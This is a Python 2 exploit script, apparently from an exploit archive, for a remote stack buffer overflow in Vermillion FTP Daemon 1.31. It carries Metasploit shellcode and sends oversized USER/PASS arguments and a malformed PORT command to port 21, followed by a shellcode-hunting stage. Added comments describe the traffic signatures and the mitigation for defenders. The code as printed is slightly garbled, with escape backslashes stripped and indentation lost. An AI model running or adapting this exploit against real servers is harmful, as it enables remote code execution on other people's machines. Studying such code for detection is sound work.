
# Title : Vermillion FTP Daemon v1.31 Remote BOF Exploit
# Published : 2010-01-30
# Author : Dz_attacker


# Exploit Title: Vermillion FTP Daemon Remote BOF Exploit
# Date: 29/01/2010
# Author: Dz_attacker
# Software Link: http://www.softsea.com/download/Vermillion-FTP-Daemon.html
# Version: 1.31
# Tested on: Windows XP SP3
# Code :

#!/usr/bin/python

#[+] Original : http://www.global-evolution.info/news/files/vftpd/vftpd.txt

# Proof-of-concept for a stack buffer overflow in Vermillion FTP Daemon 1.31
# (per the header above; tested on Windows XP SP3). Python 2 syntax throughout
# (print statements, raw_input). The script is a flat run of statements:
# usage check, payload/buffer construction, then two TCP sessions to port 21.
#
# Defender's notes -- what this traffic looks like on the wire:
#  - session 1 sends USER and PASS arguments of 500 characters each, far
#    beyond any legitimate credential length;
#  - session 2 sends a PORT command whose argument is dozens of 8-digit,
#    comma-separated fields rather than the six small decimal values
#    (h1,h2,h3,h4,p1,p2) the FTP protocol defines.
# Either shape is a reasonable alert condition for an FTP front end or IDS;
# the mitigation is to retire or upgrade vftpd and keep it off untrusted
# networks.

import socket
import sys
import time

# Exactly one argument (the target IP) is required; otherwise print usage and
# exit. NOTE: as printed on this page the statements after the `if` sit at
# column 0, so they are not syntactically part of its body as listed.
if (len(sys.argv) != 2):
print "+++++++++++++++++++++++++++++++++++++++++++++++++"
print "[+] Vftpd Remote BOF Exploit"
print "[+] Exploit By Dz_attacker (dz_attacker@hotmail.fr)"
print "[+] Usage : %s <target_ip>" %sys.argv[0]
print "+++++++++++++++++++++++++++++++++++++++++++++++++n"
sys.exit(0)



# Metasploit-generated win32_exec payload (per the comment below: runs calc,
# 160 bytes, PexFnstenvSub-encoded) -- that is the ten rows of 16 bytes from
# the second row on. The first row is not part of that payload: a 4-byte
# marker repeated twice followed by eight x90 bytes. Presumably the marker is
# what the "hunting" stage (see the final status messages) searches memory
# for; that cannot be confirmed from this listing.
# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x44x5ax32x37x44x5ax32x37x90x90x90x90x90x90x90x90"
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc1"
"xbcxecx76x83xebxfcxe2xf4x3dx54xa8x76xc1xbcx67x33"
"xfdx37x90x73xb9xbdx03xfdx8exa4x67x29xe1xbdx07x3f"
"x4ax88x67x77x2fx8dx2cxefx6dx38x2cx02xc6x7dx26x7b"
"xc0x7ex07x82xfaxe8xc8x72xb4x59x67x29xe5xbdx07x10"
"x4axb0xa7xfdx9exa0xedx9dx4axa0x67x77x2ax35xb0x52"
"xc5x7fxddxb6xa5x37xacx46x44x7cx94x7ax4axfcxe0xfd"
"xb1xa0x41xfdxa9xb4x07x7fx4ax3cx5cx76xc1xbcx67x1e"
"xfdxe3xddx80xa1xeax65x8ex42x7cx97x26xa9xc2x34x94"
"xb2xd4x74x88x4bxb2xbbx89x26xdfx8dx1axa2xbcxecx76")

# Second-stage data carried inside the PORT argument: comma-separated 8-digit
# fields, every one beginning "92". How the daemon decodes them is not shown
# here; from the defender's side the significant fact is the shape -- a PORT
# argument is specified as exactly six decimal values, never 40-odd fields.
stage = "92060006,92080001,92120010,92150015,92000015,92040002,"
stage += "92050002,92060010,92000002,92050008,92120013,92020014,"
stage += "92030012,92000005,92050010,92070004,92140015,92110008,"
stage += "92040004,92050010,92030002,92030007,92080011,92150010,"
stage += "92100015,92070005,92140010,92100015,92070005,92140007,"
stage += "92150015,92140007,"

# Pad the shellcode literal to exactly 500 characters with "x44" so the
# USER/PASS argument sent below always has the same fixed length.
payload = shellcode + "x44"*(500-len(shellcode))

# Full PORT argument: 11 filler fields, the stage, eight more 8-digit fields,
# and a bare trailing "2" with no closing comma.
buffer = "92040001,"*11
buffer += stage
buffer += "92020004,"
buffer += "92150011,"
buffer += "92010002,"
buffer += "92000000,"
buffer += "92020013,"
buffer += "92070000,"
buffer += "92040002,"
buffer += "92000000,"
buffer += "2"

# Session 1: connect to the FTP control port (21), read the banner, then send
# USER and PASS with the 500-character payload as the argument, followed by
# SYST and QUIT. Each recv(1024) consumes the server's reply before the next
# command goes out. (`connect` holds None; socket.connect returns nothing.)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((sys.argv[1],21))
print "[x] Sending Shellcode..."
s.recv(1024)
s.send('USER '+payload+'rn')
s.recv(1024)
s.send('PASS '+payload+'rn')
s.recv(1024)
s.send('SYSTrn')
s.recv(1024)
s.send('QUITrn')
s.recv(1024)
s.close()

time.sleep(2)

# Session 2, two seconds later: a fresh connection sends the PORT command with
# the oversized argument and closes at once without reading the banner or any
# reply. Nothing below checks whether the target actually responded; the
# remaining sleeps and the final prompt are purely cosmetic.
s2=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1],21))
print "[x] Sending Exploit..."
s2.send('PORT '+buffer+'rn')
s2.close()
time.sleep(2)
print "[x] Hunting the shellcode..."
time.sleep(3)
raw_input("[x] Done, press enter to quit")